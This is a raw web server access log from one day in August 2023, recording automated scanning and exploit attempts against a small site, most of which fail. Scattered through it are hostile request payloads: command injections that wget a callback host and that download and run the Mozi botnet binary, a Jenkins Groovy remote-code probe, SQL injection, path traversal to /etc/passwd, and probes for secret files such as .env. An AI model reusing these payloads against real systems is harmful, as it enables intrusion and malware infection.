45.128.232.140 - - [28/Aug/2023:00:12:20 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 84.54.51.142 - - [28/Aug/2023:00:24:13 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 192.155.90.220 - - [28/Aug/2023:00:37:09 +0200] "GET / HTTP/1.1" 200 1895 198.235.24.110 - - [28/Aug/2023:01:10:42 +0200] "GET / HTTP/1.0" 200 1895 80.76.51.60 - - [28/Aug/2023:01:28:41 +0200] "CONNECT duckduckgo.com:443 HTTP/1.1" 400 804 45.128.232.125 - - [28/Aug/2023:02:42:03 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 178.148.96.6 - - [28/Aug/2023:03:12:21 +0200] "GET / HTTP/1.0" 200 1895 147.78.47.10 - - [28/Aug/2023:03:32:10 +0200] "-" 400 1930 78.108.177.50 - - [28/Aug/2023:03:57:36 +0200] "GET / HTTP/1.0" 200 1895 148.153.185.14 - - [28/Aug/2023:04:10:35 +0200] "-" 400 1930 148.153.185.14 - - [28/Aug/2023:04:10:46 +0200] "-" 400 1930 148.153.185.14 - - [28/Aug/2023:04:10:46 +0200] "-" 400 1930 148.153.185.14 - - [28/Aug/2023:04:10:48 +0200] "GET / HTTP/1.1" 200 1895 148.153.185.14 - - [28/Aug/2023:04:11:08 +0200] "GET /favicon.ico HTTP/1.1" 404 729 148.153.185.14 - - [28/Aug/2023:04:11:09 +0200] "GET /robots.txt HTTP/1.1" 404 728 148.153.185.14 - - [28/Aug/2023:04:11:09 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 141.98.11.60 - - [28/Aug/2023:04:15:25 +0200] "GET / HTTP/1.1" 200 1895 104.167.222.2 - - [28/Aug/2023:04:16:36 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 198.98.58.175 - - [28/Aug/2023:04:34:36 +0200] "CONNECT ip138.com:443 HTTP/1.1" 400 804 103.77.172.30 - - [28/Aug/2023:04:38:13 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 143.42.76.146 - - [28/Aug/2023:04:56:03 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 209.141.40.248 - - [28/Aug/2023:05:05:19 +0200] "CONNECT ip138.com:443 HTTP/1.1" 400 804 159.203.133.168 - - [28/Aug/2023:05:16:01 +0200] "GET /SAAS/t/_/;/WEB-INF/web.xml HTTP/1.1" 404 764 159.203.133.168 - - [28/Aug/2023:05:16:17 +0200] "GET /rest/v1/AccountService/Accounts HTTP/1.1" 404 761 159.203.133.168 - - [28/Aug/2023:05:16:18 +0200] "GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://cjlvddsskmeee6il8n30yihpdtpmey4ef.oast.site;%27 HTTP/1.1" 404 738 179.43.191.194 - - [28/Aug/2023:05:16:23 +0200] "-" 400 1930 159.203.133.168 - - [28/Aug/2023:05:16:27 +0200] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1" 404 851 159.203.133.168 - - [28/Aug/2023:05:16:27 +0200] "POST /cobbler_api HTTP/1.1" 404 729 159.203.133.168 - - [28/Aug/2023:05:16:28 +0200] "GET /devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1" 404 733 159.203.133.168 - - [28/Aug/2023:05:16:36 +0200] "GET /portal/info.jsp HTTP/1.1" 404 737 159.203.133.168 - - [28/Aug/2023:05:16:40 +0200] "POST /webapi/auth HTTP/1.1" 404 733 159.203.133.168 - - [28/Aug/2023:05:16:50 +0200] "POST /actuator/env HTTP/1.1" 404 734 159.203.133.168 - - [28/Aug/2023:05:16:57 +0200] "POST /jeecg-boot/jmreport/qurestSql HTTP/1.1" 404 755 159.203.133.168 - - [28/Aug/2023:05:17:00 +0200] "POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 404 771 159.203.133.168 - - [28/Aug/2023:05:17:01 +0200] "POST /dologin.action HTTP/1.1" 404 732 159.203.133.168 - - [28/Aug/2023:05:17:01 +0200] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 404 802 159.203.133.168 - - [28/Aug/2023:05:17:04 +0200] "POST /checkValid HTTP/1.1" 404 728 159.203.133.168 - - [28/Aug/2023:05:17:13 +0200] "POST /zms/admin/index.php HTTP/1.1" 404 745 159.203.133.168 - - [28/Aug/2023:05:17:57 +0200] "POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1" 404 793 159.203.133.168 - - [28/Aug/2023:05:23:27 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 745 159.203.133.168 - - [28/Aug/2023:05:25:38 +0200] "POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 404 767 143.42.76.146 - - [28/Aug/2023:05:26:50 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 159.203.133.168 - - [28/Aug/2023:05:27:21 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 745 45.128.232.140 - - [28/Aug/2023:05:51:57 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 207.180.223.28 - - [28/Aug/2023:05:54:59 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 104.167.222.2 - - [28/Aug/2023:06:32:27 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 159.203.133.168 - - [28/Aug/2023:06:56:13 +0200] "GET /qvisdvr/ HTTP/1.1" 404 730 159.203.133.168 - - [28/Aug/2023:07:09:47 +0200] "POST /Upload/upload_file.php?l=test HTTP/1.1" 404 744 159.203.133.168 - - [28/Aug/2023:07:09:51 +0200] "GET /Upload/test/2Ualjbhk3X9vyF10DB7JACRryBT.php HTTP/1.1" 404 769 45.128.232.125 - - [28/Aug/2023:08:16:39 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 183.136.225.9 - - [28/Aug/2023:08:46:30 +0200] "GET / HTTP/1.1" 200 1895 183.136.225.9 - - [28/Aug/2023:08:46:32 +0200] "GET / HTTP/1.1" 200 1895 183.136.225.9 - - [28/Aug/2023:08:46:34 +0200] "GET /favicon.ico HTTP/1.1" 404 729 183.136.225.9 - - [28/Aug/2023:08:46:34 +0200] "GET /robots.txt HTTP/1.1" 404 728 167.94.146.56 - - [28/Aug/2023:08:49:53 +0200] "GET / HTTP/1.1" 200 1895 167.94.146.56 - - [28/Aug/2023:08:49:53 +0200] "GET / HTTP/1.1" 200 1895 167.94.146.56 - - [28/Aug/2023:08:49:53 +0200] "GET /favicon.ico HTTP/1.1" 404 729 159.203.133.168 - - [28/Aug/2023:09:02:58 +0200] "GET /2UaljYRL4PziWwVvA5uCjKJ1UlF.txt HTTP/1.1" 404 749 159.203.133.168 - - [28/Aug/2023:09:03:02 +0200] "PUT /2UaljYRL4PziWwVvA5uCjKJ1UlF.txt HTTP/1.1" 405 694 159.203.133.168 - - [28/Aug/2023:09:03:06 +0200] "GET /2UaljYRL4PziWwVvA5uCjKJ1UlF.txt HTTP/1.1" 404 749 84.54.51.27 - - [28/Aug/2023:09:04:07 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 159.203.133.168 - - [28/Aug/2023:09:04:59 +0200] "POST /apply_sec.cgi HTTP/1.1" 404 731 159.203.133.168 - - [28/Aug/2023:09:05:03 +0200] "POST /apply_sec.cgi HTTP/1.1" 404 731 159.203.133.168 - - [28/Aug/2023:09:05:07 +0200] "POST /apply_sec.cgi HTTP/1.1" 404 731 159.203.133.168 - - [28/Aug/2023:09:13:15 +0200] "GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1" 400 816 159.203.133.168 - - [28/Aug/2023:09:13:19 +0200] "GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 400 816 159.203.133.168 - - [28/Aug/2023:09:13:23 +0200] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 816 192.241.222.40 - - [28/Aug/2023:09:24:08 +0200] "GET / HTTP/1.1" 200 1895 165.227.69.102 - - [28/Aug/2023:09:25:32 +0200] "-" 400 1930 165.227.69.102 - - [28/Aug/2023:09:38:10 +0200] "-" 400 1930 103.77.172.30 - - [28/Aug/2023:09:51:48 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 45.128.232.183 - - [28/Aug/2023:10:02:03 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 165.227.69.102 - - [28/Aug/2023:10:33:10 +0200] "GET / HTTP/1.1" 200 1895 165.227.69.102 - - [28/Aug/2023:10:33:10 +0200] "GET /favicon.ico HTTP/1.1" 404 729 170.64.183.148 - - [28/Aug/2023:10:57:04 +0200] "-" 400 1930 170.64.183.148 - - [28/Aug/2023:10:57:05 +0200] "-" 400 1930 170.64.183.148 - - [28/Aug/2023:10:57:05 +0200] "GET / HTTP/1.1" 200 1895 170.64.183.148 - - [28/Aug/2023:10:57:06 +0200] "-" 400 1930 170.64.183.148 - - [28/Aug/2023:10:57:06 +0200] "GET / HTTP/1.1" 400 771 170.64.183.148 - - [28/Aug/2023:10:57:07 +0200] "-" 400 1930 198.98.58.175 - - [28/Aug/2023:11:02:52 +0200] "CONNECT ip138.com:443 HTTP/1.1" 400 804 87.236.176.27 - - [28/Aug/2023:11:57:45 +0200] "GET / HTTP/1.1" 200 1895 84.54.51.142 - - [28/Aug/2023:12:11:09 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 94.102.61.45 - - [28/Aug/2023:12:34:33 +0200] "GET / HTTP/1.1" 200 1895 68.69.184.62 - - [28/Aug/2023:12:50:38 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 78.108.177.54 - - [28/Aug/2023:13:42:08 +0200] "GET / HTTP/1.0" 200 1895 50.31.21.9 - - [28/Aug/2023:13:59:53 +0200] "GET / HTTP/1.0" 200 1895 84.54.51.254 - - [28/Aug/2023:14:00:30 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 209.141.40.248 - - [28/Aug/2023:14:01:08 +0200] "CONNECT ip138.com:443 HTTP/1.1" 400 804 50.31.21.9 - - [28/Aug/2023:14:01:50 +0200] "GET / HTTP/1.0" 200 1895 50.31.21.9 - - [28/Aug/2023:14:01:50 +0200] "GET / HTTP/1.1" 200 1895 50.31.21.9 - - [28/Aug/2023:14:01:50 +0200] "GET /nmaplowercheck1693224110 HTTP/1.1" 404 742 50.31.21.9 - - [28/Aug/2023:14:01:50 +0200] "HEAD / HTTP/1.1" 200 - 50.31.21.9 - - [28/Aug/2023:14:01:50 +0200] "POST /sdk HTTP/1.1" 404 721 50.31.21.9 - - [28/Aug/2023:14:01:51 +0200] "GET /HNAP1 HTTP/1.1" 404 723 50.31.21.9 - - [28/Aug/2023:14:01:52 +0200] "GET /evox/about HTTP/1.1" 404 732 180.149.125.159 - - [28/Aug/2023:14:59:37 +0200] "GET /c/ HTTP/1.1" 404 724 103.14.225.161 - - [28/Aug/2023:15:08:14 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 45.128.232.125 - - [28/Aug/2023:15:10:38 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 193.35.18.33 - - [28/Aug/2023:15:24:13 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 118.123.105.92 - - [28/Aug/2023:15:46:21 +0200] "-" 400 1930 118.123.105.92 - - [28/Aug/2023:15:46:30 +0200] "-" 400 1930 118.123.105.92 - - [28/Aug/2023:15:46:32 +0200] "-" 400 1930 118.123.105.92 - - [28/Aug/2023:15:47:30 +0200] "-" 400 1930 118.123.105.92 - - [28/Aug/2023:15:47:31 +0200] "-" 400 1930 118.123.105.92 - - [28/Aug/2023:15:47:34 +0200] "-" 400 1930 118.123.105.92 - - [28/Aug/2023:15:47:34 +0200] "-" 400 1930 118.123.105.92 - - [28/Aug/2023:15:47:37 +0200] "-" 400 1930 118.123.105.92 - - [28/Aug/2023:15:47:37 +0200] "-" 400 1930 118.123.105.92 - - [28/Aug/2023:15:47:38 +0200] "-" 400 1930 118.123.105.92 - - [28/Aug/2023:15:47:39 +0200] "-" 400 1930 104.167.222.2 - - [28/Aug/2023:16:06:27 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 194.165.16.10 - - [28/Aug/2023:16:14:36 +0200] "-" 400 1930 68.69.184.62 - - [28/Aug/2023:16:25:11 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 35.216.164.232 - - [28/Aug/2023:16:27:34 +0200] "-" 400 1930 35.216.164.232 - - [28/Aug/2023:16:27:34 +0200] "GET / HTTP/1.1" 200 1895 35.216.164.232 - - [28/Aug/2023:16:27:34 +0200] "-" 400 1930 35.216.164.232 - - [28/Aug/2023:16:27:34 +0200] "GET / HTTP/1.1" 200 1895 35.216.164.232 - - [28/Aug/2023:16:27:34 +0200] "GET /telescope/requests HTTP/1.1" 404 740 35.216.164.232 - - [28/Aug/2023:16:27:34 +0200] "GET /info.php HTTP/1.1" 404 726 35.216.164.232 - - [28/Aug/2023:16:27:34 +0200] "GET /.git/config HTTP/1.1" 404 733 35.216.164.232 - - [28/Aug/2023:16:27:34 +0200] "GET /server-status HTTP/1.1" 404 731 35.216.164.232 - - [28/Aug/2023:16:27:34 +0200] "GET /config.json HTTP/1.1" 404 729 35.216.164.232 - - [28/Aug/2023:16:27:34 +0200] "GET /.env HTTP/1.1" 404 722 35.216.235.60 - - [28/Aug/2023:16:27:40 +0200] "GET / HTTP/1.1" 200 1895 176.97.210.105 - - [28/Aug/2023:16:37:38 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 34.140.130.61 - - [28/Aug/2023:16:41:17 +0200] "GET / HTTP/1.1" 200 1895 45.128.232.140 - - [28/Aug/2023:16:56:13 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.249.244.58 - - [28/Aug/2023:17:36:22 +0200] "GET / HTTP/1.1" 200 1895 45.128.232.125 - - [28/Aug/2023:17:39:44 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 198.98.58.175 - - [28/Aug/2023:17:48:27 +0200] "CONNECT ip138.com:443 HTTP/1.1" 400 804 178.72.78.97 - - [28/Aug/2023:18:35:02 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 727 192.241.215.42 - - [28/Aug/2023:18:37:23 +0200] "GET /hudson HTTP/1.1" 404 724 152.89.198.113 - - [28/Aug/2023:18:58:59 +0200] "-" 400 1930 45.128.232.183 - - [28/Aug/2023:19:21:20 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 46.174.191.31 - - [28/Aug/2023:19:37:27 +0200] "GET / HTTP/1.0" 200 1895 45.128.232.152 - - [28/Aug/2023:20:01:00 +0200] "CONNECT duckduckgo.com:443 HTTP/1.1" 400 804 112.0.193.67 - - [28/Aug/2023:20:01:47 +0200] "GET /manager/html HTTP/1.1" 401 2499 192.241.201.8 - - [28/Aug/2023:20:21:39 +0200] "-" 400 1930 71.6.232.22 - - [28/Aug/2023:20:31:32 +0200] "GET / HTTP/1.1" 200 1895 179.43.191.194 - - [28/Aug/2023:20:32:25 +0200] "-" 400 1930 45.128.232.140 - - [28/Aug/2023:20:59:12 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 84.54.51.27 - - [28/Aug/2023:21:25:48 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.79.181.104 - - [28/Aug/2023:21:58:09 +0200] "-" 400 1930 162.142.125.213 - - [28/Aug/2023:22:22:57 +0200] "GET / HTTP/1.1" 200 1895 162.142.125.213 - - [28/Aug/2023:22:22:57 +0200] "GET / HTTP/1.1" 200 1895 162.142.125.213 - - [28/Aug/2023:22:22:58 +0200] "GET /favicon.ico HTTP/1.1" 404 729 181.91.61.223 - - [28/Aug/2023:22:25:54 +0200] "GET / HTTP/1.1" 400 771 193.35.18.33 - - [28/Aug/2023:23:22:04 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 209.141.40.248 - - [28/Aug/2023:23:24:31 +0200] "CONNECT ip138.com:443 HTTP/1.1" 400 804 89.248.172.16 - - [28/Aug/2023:23:48:21 +0200] "GET / HTTP/1.1" 200 1895 89.248.172.16 - - [28/Aug/2023:23:48:22 +0200] "GET /favicon.ico HTTP/1.1" 404 729